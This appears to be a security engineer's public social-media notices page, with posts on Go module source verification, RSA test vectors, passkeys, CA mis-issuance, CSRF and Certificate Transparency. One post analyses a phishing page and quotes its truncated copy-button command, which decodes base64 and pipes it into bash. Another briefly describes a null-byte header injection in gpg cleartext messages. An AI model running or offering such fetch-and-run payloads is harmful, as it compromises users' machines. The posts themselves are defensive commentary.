Notices by Filippo Valsorda (filippo@abyssdomain.expert)

I wish that those surveys so often cited by InfoSec pundits that ask

Do you fully trust AI output?
Do you always verify AI output?

also asked

Do you fully trust your colleagues' output?
Do you always verify your colleagues' output?

Just to have comparative numbers, you know.

The Go Checksum Database guarantees that every Go build on the planet uses the same source for a given module version.

However, GitHub might not show you that code.

https://pkg.geomys.org is a simple service to view the canonical source of a Go module, and it comes with Chrome/Firefox extensions to replace pkg.go.dev source links.

https://words.filippo.io/go-source/?source=Mastodon

Hell yeah, we got the first (of four) hit! So relieved this is working.

It's the easiest to find case: a double rejection which has probability (2^-16 + 2^-16)² = 2^-30.

We should see a handful of these before we hit the other two ~2^-31 cases and the (2^-16)² = 2^-32 case.

Do you have an idle cluster? Can you spare a couple core-years?

Help me bruteforce some test vectors for RSA key generation edge cases!

Here are the instructions, it's just a matter of running a single self-contained cross-compilable Go binary that will report the results autonomously.

https://gist.github.com/FiloSottile/19e7ceb1fdcdaa128f7d3319ad0939fa

At the https://gpg.fail talk and omg #39c3

You can just put a \0 in the Hash: header and then newlines and inject text in a cleartext message.

Won’t even blame PGP here. C is unsafe at any speed.

gpg has not fixed it yet.

Really big age release coming tomorrow! 🎅🏻

- native post-quantum keys
- built-in recipients for hw plugins
- age-inspect tool
- plugin framework
- batchpass plugin
- many improved error messages

https://age-encryption.org

When I talk about professionalizing open source maintenance, and about the Geomys Standard of Care, this is what it is about.

The solution is neither gatekeeping nor blanket legal liability nor making demands of volunteers. The solution is relying on, and funding, professionals.

https://forum.syncthing.net/t/does-anyone-know-why-syncthing-fork-is-no-longer-available-on-github/25661/165

@kasperd I am also more comfortable with hybrids for now, but Bernstein is openly arguing that the NSA is pushing pure PQ as a way to undermine encryption.

@oec @kasperd

The IETF is literally publishing multiple hybrid KEM documents, and is publishing hybrids for TLS with RECOMMENDED=Y while pure ML-KEM is being published RECOMMENDED=N.

What are you even talking about.

@untitaker @wolf480pl @whitequark serious question: how many users do you think ever bulk exported passwords from a password manager, as a proportion of all users that ever used a password?

IMHO, bulk export is a niche use case, and per-site migration is solved by "add another passkey" or "reset flow".

@wolf480pl @whitequark to this day I do not understand the lock-in argument: just register two passkeys if you're worried! Or do a password/passkey reset if you lose access. These are both not super user friendly options, but neither is exporting passwords from a password manager?

Serious take: the solution to Safe Browsing false positives like the Immich one is passkeys.

Phishing regularly upends people's lives. The Safe Browsing cat-and-mouse with all its opaque false positives will be necessary until we roll out phishing-resistant auth.

@glyph @0xabad1dea @tribut The EU is trying that, right? Does Geomys have strict liability for all of Go? Or does Google? Why would Google let Geomys maintain Go if the liability falls on them? Does a maintainer with a Patreon have strict liability? What about a maintainer who scored their first $10k support contract, which is not enough to pay both taxes and E&O insurance?

I understand the desire to stick it to the man, but the system needs to be viable, not just desirable.

There is some chatter about a CA mis-issuing a certificate for 1.1.1.1. https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/SgwC1QsEpvc/m/0V_VMV7uAgAJ

This CA (https://crt.sh/?caid=201916, only ~300 certs) is only trusted by (1) the Microsoft root program, and (2) the eIDAS QWAC trusted list.

MS has not been actively managing their root program for years now, and the EU wanted to push theirs on browsers with much better ones.

I edited my Cross-Site Request Forgery countermeasures research into a stand-alone article, including recommendations reusable by other projects.

tl;dr: no need for tokens or keys, modern browsers tell you if a request is cross-origin!

https://words.filippo.io/csrf?source=Mastodon

Certificate Transparency is meant for browsers and website owners.

However, I estimate a majority of clients is only interested in discovering domain names, and never checks signatures. I am proposing an additional, optional, less secure, and 20x more efficient API for those clients.

This should make it possible to run a CT log with less than 1 Gbps.

https://groups.google.com/a/chromium.org/d/msgid/ct-policy/bcfca3d1-7547-4dc4-b43d-7bf1549f6815%40app.fastmail.com

The small joys of a custom personal site, and of custom Go module paths: I was annoyed that full symbol names like https://filippo.io/sunlight.Client didn't linkify to their docs, so I fixed it!

https://github.com/FiloSottile/mostly-harmless/commit/c9686a608abdd28ebbf6223ef30ba210388dd2a7

I want to set up append-only backups with ZFS, like https://ruderich.org/simon/notes/append-only-backups-with-restic-and-rclone.

However, this part of zfs-receive.8 makes it sound like a compromised sender could cause snapshots to be deleted on the recipient.

Does ZFS replication unavoidably trust the sender?

This is pretty well executed phishing.

The Copy button copies to the clipboard

echo "Y3Vy[...]ggJg==" | base64 -d | bash

which in turn curls this script https://gist.github.com/FiloSottile/385137f5ca2eabb51fd206bde2ff1d0a into bash.

They even detect piping, so to read it you have to run "curl | cat".

@whitequark @cks @mei updated the text not to mention pagers. How to hit 99% is up to the operator, and it doesn’t require 24/7 people.